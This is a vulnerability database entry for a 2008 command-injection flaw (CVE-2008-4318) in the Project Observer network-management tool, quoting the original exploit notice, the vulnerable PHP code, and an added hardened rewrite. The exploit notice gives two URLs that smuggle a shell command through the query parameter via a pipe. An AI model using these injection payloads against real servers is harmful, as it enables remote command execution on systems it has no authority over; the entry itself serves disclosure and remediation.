Project Observer Arbitrary Command Execution Vulnerability

Vulnerability ID: 1116202    Vulnerability type: Input validation
Published: 2008-09-24    Updated: 2008-09-29
CVE: CVE-2008-4318    CNNVD-ID: CNNVD-200809-407
Platform: PHP    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/6559
https://www.securityfocus.com/bid/84763
https://cxsecurity.com/issue/WLB-2008100090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-407
|Vulnerability details
Project Observer is a PHP/MySQL/SNMP/CDP-based network management system. Observer 0.3.2.1 and earlier allow remote attackers to execute arbitrary commands via shell metacharacters in the query parameter to (1) whois.php or (2) netcmd.php.
|Vulnerability EXP
:::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################
 #  [ observer <= 0.3.2.1 ]   Remote Command Execution   #
 #########################################################
 #
 # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
 #
 # Script site: http://www.project-observer.org/
 # Download: http://freshmeat.net/projects/observer/
 #
 # Vuln: 
 # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
 # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a    
 #
 #
 # Bug(1): ./observer-0.3.2.1/html/whois.php
 #
 # ...
 # 	$output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #	$output = trim($output);
 #	echo("<pre>$output</pre>");
 # ... 	 
 #
 #
 # Bug(2): ./observer-0.3.2.1/html/netcmd.php
 #
 # ...
 #  switch ($_GET[cmd]) {
 #   case 'whois':
 #     $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #     break;
 #   case 'ping':
 #     $output = `/bin/ping $_GET[query]`;
 #     break;
 #   case 'tracert':
 #     $output = `/usr/sbin/traceroute $_GET[query]`;
 #     break;
 #   case 'nmap':
 #     $output = `/usr/bin/nmap $_GET[query]`;
 #     break;
 #  }
 #  $output = trim($output);
 #  echo("<pre>$output</pre>");
 # ... 			    		    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-24]
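Both bugs come from interpolating the raw query parameter into a backtick command, so /bin/sh parses any `|`, `;` or backticks in it. As an added example (not the advisory's or the project's code), a hardened rewrite of the netcmd.php dispatch: an allowlist maps cmd to a fixed binary, query must validate as an IP address or hostname before use, and escapeshellarg() quotes it as defence in depth. The tool paths and the `ping -c 4` count are assumptions; the same validate_target() check fixes whois.php.

```php
<?php
// Hardened replacement for the netcmd.php switch (added example, not project code).
// Assumes the four tools live at the same paths as in the advisory.

// Allowlist: the 'cmd' parameter selects a fixed command, never a user string.
$allowed = [
    'whois'   => '/usr/bin/whois',
    'ping'    => '/bin/ping -c 4',        // bounded; assumption, not in the original
    'tracert' => '/usr/sbin/traceroute',
    'nmap'    => '/usr/bin/nmap',
];

// Return the target if it is an IP address or a DNS hostname, else null.
// Labels may not start with '-', so the value can never be read as a tool option.
function validate_target(string $query): ?string
{
    $query = trim($query);
    if (filter_var($query, FILTER_VALIDATE_IP) !== false) {
        return $query;
    }
    $label = '(?!-)[A-Za-z0-9-]{1,63}';
    if (strlen($query) <= 253 && preg_match("/^{$label}(\\.{$label})*\\.?$/", $query)) {
        return $query;
    }
    return null;
}

$cmd    = $_GET['cmd'] ?? '';
$target = validate_target($_GET['query'] ?? '');

if (!isset($allowed[$cmd]) || $target === null) {
    http_response_code(400);
    exit('invalid request');
}

// escapeshellarg() single-quotes the value, so shell metacharacters reach the
// tool literally. Validation above is the primary control; quoting is backup.
$output = shell_exec($allowed[$cmd] . ' ' . escapeshellarg($target) . ' 2>&1');
if (!is_string($output)) {
    $output = '';
}

// Escape tool output before embedding it in the HTML page.
echo '<pre>' . htmlspecialchars(trim($output), ENT_QUOTES, 'UTF-8') . '</pre>';
```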
|Affected products
Project-Observer Observer 0.3.2.1
Project-Observer Observer 0.3.2
Project-Observer Observer 0.2.4
Project-Observer Observer 0.2.3
Project-
|References

Source: XF
Name: observer-whois-netcmd-command-execution(45398)
Link: http://xforce.iss.net/xforce/xfdb/45398
Source: MILW0RM
Name: 6559
Link: http://www.milw0rm.com/exploits/6559
Source: SREASON
Name: 4322
Link: http://securityreason.com/securityalert/4322